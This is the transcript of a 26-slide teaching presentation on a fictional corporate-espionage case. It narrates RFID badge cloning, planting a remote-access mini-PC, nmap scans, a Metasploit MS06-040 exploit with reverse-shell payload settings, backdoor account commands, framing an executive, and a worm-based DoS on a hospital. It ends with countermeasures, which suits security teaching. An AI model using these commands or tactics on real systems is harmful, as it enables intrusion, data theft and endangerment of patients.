1 / 26

Tel 283

Tel 283. Corporate Espionage. Background. Comptetitor of Alki Pharmaceuticals wants to get any technical information or research Not have the hack traced back Launch a disabling attack on the hospital across from Alki Critical services impacted, resulting in patient death

diem
Download Presentation

Tel 283

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Tel 283 Corporate Espionage

  2. Background • Comptetitor of Alki Pharmaceuticals wants to get any technical information or research • Not have the hack traced back • Launch a disabling attack on the hospital across from Alki • Critical services impacted, resulting in patient death • “Contractor” threatened hacker’s girlfriend • Eight weeks allowed for the hack

  3. Cost of corporate espionage • 1999 $25 Billion • US Chamber of Commerce survey • 2003 $89 Billion from the Fortune 1000 companies • Pricewaterhouse Coopers and ASIS survey (American Society for Industrial Security) • 2007 $100 Billion plus

  4. The Exploit • Reconnaissance • Physical Access • Executing the Hacks • DoS of Hospital • Other “stuff”

  5. Recon • Google search • “intext:alki pharmaceuticals” • Mentions software vendor for Alki • Get info from vendor’s webpage • Technical documentation • Type of servers • Ports • Technical forum • SA from Alki complaining about software’s restrictions • Physical recon • Employees have RFID badges • www.sec.gov • EDGAR search on publicly traded corporations

  6. RFIDIOt • Python libraries for reading RFID devices • Readers are available for purchase • Depending on standard, anywhere from $50 to $1000 • A writer will clone a valid RFID device • Phoenix met official of Alki • Got physically close enough to read her badge • Now has access to every place the CFO is allowed

  7. Social engineering • CFO takes “prospective employee” on tour • Observes which areas are carded • Reads cards of 15 employees • Remembering the order of cards being read and locations • Will attempt to get a janitor’s RFID card as well

  8. Tools • Mini-PC with Vista • VMWare • Running Knoppix Live CD ISO • Integrated CDMA-EVO cellular card • Integrated 10/100 Ethernet NIC • Phoenix hopes to plant the mini-PC physically at Alki • Get IP via DHCP • Connect to Internet using the cellular card • Using Hotmail account traceable back to Alki employee (backup email account points back to the employee) • Set up GoToMyPC trial account • Physical intrusion set for when janitors start night services

  9. Intrusion • Phoenix takes elevator (using cloned CFO’s card) and enters the NOC room • Uses card to enter the NOC room • No biometrics in place! • Racks are neatly labeled indicating which units are R&D switches

  10. Intrusion • Phoenix plugs patch cable into an open port on R&D switch • Attaches the mini-PC to the switch • Gets an IP via DHCP • Boots up the Knoppix Live CD ISO under VMWare • Ifconfig reveals a supplied IP address of 10.0.0.6 • Going back to the host OS (Vista), he fires up the CDMA software • GoToMyPC is connected to the Internet • Secretes the mini-PC and the power supply • Takes a wireless access point, with an Alki inventory control tag and leaves

  11. Intrusion • On the train going home Phoenix uses a CDMA connection on his laptop to verify a connection • Brings up a web browser • Utilizing the CFO’s bogus account, logs into www.gotomypc.com • Connects to the planted mini-PC in the Alki NOC room

  12. Intrusion • On returning home, reconnects using GoToMyPC • Goes to the VMWare and in the shell starts up Nmap • nmap 10.0.0.0/24 • Shows the hosts and which ports are listening on these hosts • 10.0.0.14 • Shows port 12345, which was the port the R&D server listens on (info developed through passive intel gathering) • nmap –A 10.0.0.14 –p 12345 • Attempts to uncover the OS • Response is either XP / SP2 or Windows Server 2003 • Directory Services ports are open • Probably Windows Server 2003 host

  13. Intrusion • Recalling complaints about vendor’s software being incapable of working with SP1 • www.microsoft.com/security • Search for SP1 fixes • MS06-040 netapi32.dll ex;oitable • Uses Metasploit to see if there’s an available exploit use windows/smb/ms06_040_netapi • Gets the Metasploit prompt msf exploit(ms06_040_netapi)>

  14. Metasploit • At the Metasploit prompt set PAYLOAD generic/shell_reverse_tcp set RHOST 10.0.0.14 set LHOST 10.0.0.6 • Phoenix now sees the following on his screen C:\WINDOWS\system32> • Phoenix has access to the target system!

  15. Intrusion: Target Access • Phoenix is on the target system with Local System privilege • Higher that Administrator!!! • Once on the target system Phoenix enters the following commands at the prompt • net user lindaalki$$ /ADD • (Linda is the CFO) • net localgroup administrators linda /ADD

  16. Intrusion: Hospital • Phoenix walks into the hospital and locates a room with available Ethernet plugs near the ER • gets IP address • Plugs in the stolen Alki wireless access point • Resets the AP to factory defaults • Configures it to support DHCP • Verifies that he can connect via the AP • Jacks the laptop into Ethernet port • Runs nmap 10.10.10.0/24 • Response is 12 hosts • Possibly all in ER due to proximity • Maps out the OS on each host • Results go to ADS text file • Nmap -A 10.10.10.0/24 > c:\OSDetect.txt:ads.txt

  17. Intrusion: Hospital • The laptop was purchased with cash with false information supplied at a computer “superstore” • Laptop loaded with viruses, virus construction kit, recon tools, etc • Using the laptop • Phoenix logged into the Hotmail account (posing as CFO from Alki) • Leaving the “remember me” settings on • Making investigators’ job easier • Sent/received emails asking for help on scanning, creating viruses and exploiting unpatched PCs • Visited websites, leaving history on PC • Verifies that the rouge access point functions from outside the hospital

  18. Intrusion: Alki • R&D server partitions mapped out • C: system partition • D: data partition, shared by researchers • Over a network connection a network share is established to a 1TB drive attached • Windows “Backup” of D: target system to the 1 TB drive • Physical entry back into Alki NOC room • Using the mini-PC and Remote Desktop • Data partition deleted from D: • Windows system directory deleted from C:

  19. DoS: Hospital • From coffee shop next to the hospital, Phoenix uses Remote Desktop to connect to the mini-PC in the hospital and executes “wshwc.exe” • Windows Scripting Host Worm Construction program

  20. DoS: Hospital • WSHWC • Names the work Alkibot • Payload option: Launch Denial of Service Attack • Creates a separate worm for each of the 7 Unix (Solaris) hosts identified using nmap • These .vbs files, along with 5 additional .vbs files for the other Windows boxes are saved in the laptop • Bat file constructed to execute the .vbs files sequentially • Executes the bat file

  21. DoS: Hospital • News reports • ER monitoring units (Solaris systems) were not able to send data out • Resulted in cardiac arrest of 1 patient • Incorrect medication prescribed to another patient • Drips ran out for two other patients • Alki executive arrested (CFO) • Alki stock value sharply down • Alki competitor announced they were ahead of schedule in release of drug

  22. Other options • Breach of confidentiality of employee information • Creation of backdoors, shell account • Sell these • Access to Alki’s banking information (Accounting dept.) • Stock manipulation

  23. Summary • Detailed tech info of Alki software uncovered by going to vendor’s site • RFID attack assisted in gaining physical access to Alki • Bolstered by social engineering • Nmap scan identified AlkiR&D server • Microsoft.com used to uncover potential exploits for the server • Metasploit used to invoke the exploit • Windows Backup used to copy R&D data remotely using network share • Delete of data (getting rid of evidence, causing diversion) • Hotmail account set up to implicate CFO • Set up rogue AP in hospital, lauchedDoS attack

  24. Countermeasures • Physical security • Single factor access to restricted areas • Implement multi-layer measures • Note: Encryption of the RFID means nothing if it’s cloned as the attacker does not need to “read” the data, just use it • Cameras / CCTV should be used • Access device should not also be the ID card • ID card is visible, RFID device should be in a shielded carrier • Disable open ports on a switch

  25. Countermeasures • Scanning attack • Turn off ICMP • Turn on Windows Firewall • Simplenmap scans would come back with no results • Possible to get results, just more complex scans • Client IDS • Cisco Security Agent (CSA) • Detects SYN stealth scans, for example • Perhaps make it impossible to determine which host was the R&D server

  26. Countermeasures • Social Engineering • Training! • Policies • Testing of policies • OS attacks • Patching • Pressure vendor to fix application to work with later release of OS which is patched • Consider another software solution (dump the vendor) • Data theft • encryption

More Related